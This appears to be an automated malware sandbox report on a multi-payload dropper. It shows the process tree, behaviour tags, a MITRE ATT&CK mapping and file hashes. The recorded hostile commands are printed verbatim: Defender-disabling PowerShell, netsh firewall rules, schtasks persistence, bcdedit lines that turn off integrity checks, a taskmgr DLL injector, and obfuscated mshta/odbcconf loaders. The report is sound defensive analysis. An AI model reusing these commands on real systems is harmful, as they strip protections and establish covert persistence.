C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006e94a111.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:276 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri006e94a111.exeFri006e94a111.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 2645⤵
- Program crash
PID:2916
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00aca824dcfa8.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00aca824dcfa8.exeFri00aca824dcfa8.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\is-DGBKQ.tmp\Fri00aca824dcfa8.tmp"C:\Users\Admin\AppData\Local\Temp\is-DGBKQ.tmp\Fri00aca824dcfa8.tmp" /SL5="$5015A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00aca824dcfa8.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00aca824dcfa8.exe"C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00aca824dcfa8.exe" /SILENT6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\is-3CDKD.tmp\Fri00aca824dcfa8.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CDKD.tmp\Fri00aca824dcfa8.tmp" /SL5="$401E4,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00aca824dcfa8.exe" /SILENT7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2348
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri002d0eb8ad1c781.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1476 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri002d0eb8ad1c781.exeFri002d0eb8ad1c781.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 2725⤵
- Program crash
PID:1692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0009837acb0e3f.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri0009837acb0e3f.exeFri0009837acb0e3f.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00a6abc266a1e.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00a6abc266a1e.exeFri00a6abc266a1e.exe4⤵
- Executes dropped EXE
PID:2652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri000511de73f4d6ca.exe3⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri000511de73f4d6ca.exeFri000511de73f4d6ca.exe4⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00ea564f2dd.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00ea564f2dd.exeFri00ea564f2dd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:700 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Fri00ea564f2dd.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.05⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2304 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2304 CREDAT:275457 /prefetch:26⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1964
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0024e24e95c5.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:880 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri0024e24e95c5.exeFri0024e24e95c5.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:944 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- System Location Discovery: System Language Discovery
PID:1700 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri007f1a815cd.exe /mixtwo3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri007f1a815cd.exeFri007f1a815cd.exe /mixtwo4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 2645⤵
- Program crash
PID:2244
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00787d8fbee5ae2.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00787d8fbee5ae2.exeFri00787d8fbee5ae2.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006106b9f3.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:988 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri006106b9f3.exeFri006106b9f3.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00d11173c6bdedf9.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00d11173c6bdedf9.exeFri00d11173c6bdedf9.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00d11173c6bdedf9.exe"C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00d11173c6bdedf9.exe" -u5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1848
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006955771d552.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2860 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri006955771d552.exeFri006955771d552.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri006955771d552.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri006955771d552.exe"C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri006955771d552.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:944
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri009539f6ca3c9b1.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri009539f6ca3c9b1.exeFri009539f6ca3c9b1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2436 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Fri009539f6ca3c9b1.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.05⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2220 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2220 CREDAT:275457 /prefetch:26⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3004
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri003da4b0a49fa71b6.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri003da4b0a49fa71b6.exeFri003da4b0a49fa71b6.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri003da4b0a49fa71b6.exe"C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri003da4b0a49fa71b6.exe"5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1684 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:2680
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1648
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /306-3066⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Scheduled Task/Job: Scheduled Task
PID:2360
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"7⤵
- Executes dropped EXE
PID:1632 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER8⤵
- Modifies boot configuration data using bcdedit
PID:448
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:8⤵
- Modifies boot configuration data using bcdedit
PID:2588
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:8⤵
- Modifies boot configuration data using bcdedit
PID:1768
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows8⤵
- Modifies boot configuration data using bcdedit
PID:3048
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe8⤵
- Modifies boot configuration data using bcdedit
PID:936
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe8⤵
- Modifies boot configuration data using bcdedit
PID:2760
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 08⤵
- Modifies boot configuration data using bcdedit
PID:2972
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn8⤵
- Modifies boot configuration data using bcdedit
PID:2684
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 18⤵
- Modifies boot configuration data using bcdedit
PID:1152
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}8⤵
- Modifies boot configuration data using bcdedit
PID:1872
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast8⤵
- Modifies boot configuration data using bcdedit
PID:2864
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 08⤵
- Modifies boot configuration data using bcdedit
PID:992
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}8⤵
- Modifies boot configuration data using bcdedit
PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
PID:2432
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v7⤵
- Modifies boot configuration data using bcdedit
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe7⤵PID:2336
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Scheduled Task/Job: Scheduled Task
PID:1796
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00a70cad68c17.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00a70cad68c17.exeFri00a70cad68c17.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri007b242a25024db8.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri007b242a25024db8.exeFri007b242a25024db8.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri005fb51f7290280.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri005fb51f7290280.exeFri005fb51f7290280.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00c13dae83a537d.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00c13dae83a537d.exeFri00c13dae83a537d.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2036 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00c13dae83a537d.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00c13dae83a537d.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )5⤵
- System Location Discovery: System Language Discovery
PID:1704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00c13dae83a537d.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS839971D6\Fri00c13dae83a537d.exe" ) do taskkill -f /Im "%~NXg"6⤵
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXeQ7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )8⤵
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"9⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )8⤵
- System Binary Proxy Execution: Odbcconf
- System Location Discovery: System Language Discovery
PID:712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR © /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}9⤵
- System Binary Proxy Execution: Odbcconf
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "10⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"10⤵
- System Location Discovery: System Language Discovery
PID:2976
-
-
C:\Windows\SysWOW64\odbcconf.exeodbcconf.exe /a { reGSVr .\9v~4.Ku}10⤵
- System Binary Proxy Execution: Odbcconf
- System Location Discovery: System Language Discovery
PID:3032
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "Fri00c13dae83a537d.exe"7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1123830249-1038108667-121740192620292353991338158092-13332308941269944015-600695891"1⤵PID:1900
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241111000303.log C:\Windows\Logs\CBS\CbsPersist_20241111000303.cab1⤵
- Drops file in Windows directory
PID:2552
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1System Binary Proxy Execution
1Odbcconf
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ff5f4a4eae998370c577fc5d8979bcc6
SHA15579e88336f998dfbe71efe2ad171be38180baec
SHA256e26a464beb5e702bc1974ed919c081cf84c826af740ea452bdaf96f7580fc224
SHA5122b042e4a7ac5e578525535258634b3bd78d129af941c592b0f0f5170af48e11a3709fe39d7276c26dc212ce2524a3c237e44b17830fd8fdf679efd6e1620b92f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5edafe37a39e9831625ad91e4c4c346a1
SHA1b23864c9ac35e81d4fe8d065bb7913ea52fe4d84
SHA256c11e68955223506f09d24537a13433e8e5a78859c248c1d0f6d43c1b3c3c04a5
SHA512eca5836cfe221f028939b591deba76ea6f34a6a9135a003952c0ea468c392276dca3228f1cb0b5d3f4e4c7585a896d8d1484ddede2523f513c8957bc6eb3e2e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54336e0caa021d43594d7a7521b6d969e
SHA12d85a98a8bfa2f92146f30cb6414f17da47ee05b
SHA256f9c2a64a19b1181e65015f9c4fb14b630b9bacaf0b6ec1958c341f683fe171d0
SHA512dfec4e4fade887a6d33a57958011130ae65414120849ebda2d6834835ff38ddf66aa23f1bfdc99493800e041c6d008ac0e141a233a67c55569b8262f04dcd0fb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5bfaa60483e5c09832cd7c13fce7ce0df
SHA17e9d4a93ff2b45eafbfb27b83c4ca9e50c13d225
SHA25663e0316880333e3a8fd52a1a525001f24896d8e02a8768da6ae7b03f991b16d3
SHA512f328974b7e277992938ce01c351b918c2469a4eef4c0c746396704d18ebebfde1ef31f86bdf2347c0e0119a6049a56f2cebb130bac1957452de76f425e0bd371
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e53bec97f8c95308594bb450540b5b70
SHA1d7167bda4e017aa9f7a3ecf8b2e807906fa03323
SHA2567a7083e27bfdf37b7c62b526df946791b83cdbe77aa343d3cf634f5087b13523
SHA512ed6c2c737b05728582ab8b977416849199e83bd878e27c2f21e2637bdd14939b8f75cba63f4f0537a210f60a1c220df0d44586b54be7b6a6f2643a7cfe5f6d19
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD562eb1de67bc6b2d385f87937b7b6519a
SHA1291b06f5eff2d1bc0c9000548ad87b62547f03f4
SHA256ef5e80e20032e0950a4cf56b719744f74c82f436e997691cba025103aeca3697
SHA512a173e957f9da378244ff669b8c8ce4996c4ae139a6d5bc25dd9927a2964937d9c7201a68ffa292314bd5f80017cf77c8994f10b81333cda5edf8847340228e92
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD527d580bf98c3887e7a6700ede7ae495d
SHA1a1fa566df890e6b2882f36ffe18889c9008788f1
SHA2568b8c39190cca50228602d2848ab32e2978cc4b11a329c3d78c65252dd5d05be8
SHA51221249c7b985c96707bfe9555a58c842e3b2057baf3b38df34fabb0abba4cfa0b54242c8edb16282009ff5be9a3d8f4a1e669609bbaf85addaa539debe09ff06a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5058a896f21c418769279a69c7e1df359
SHA16b461314776a2133f49908a5eadc7f5b0af57024
SHA25632e2bf7ed6ab2a72c42ebfc1c10599d3707ee522022775783d064228ffe39bc6
SHA5123044209ad5ef291c45ebab75336bebb8bc5172fd8f0608ffebca9650cf698ad1fdda6158891fdaefaa5d7533fc1adccc2eef8e24d3fda425b8db4369f262ae2b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b1ef717a778028b91815d73a638fa67a
SHA1af0998ad65c9d94cd3dc61741884b309739f85bb
SHA25611de4d7fc5c211077432b391428642b09b5b255f04a710e2712479910f5e960b
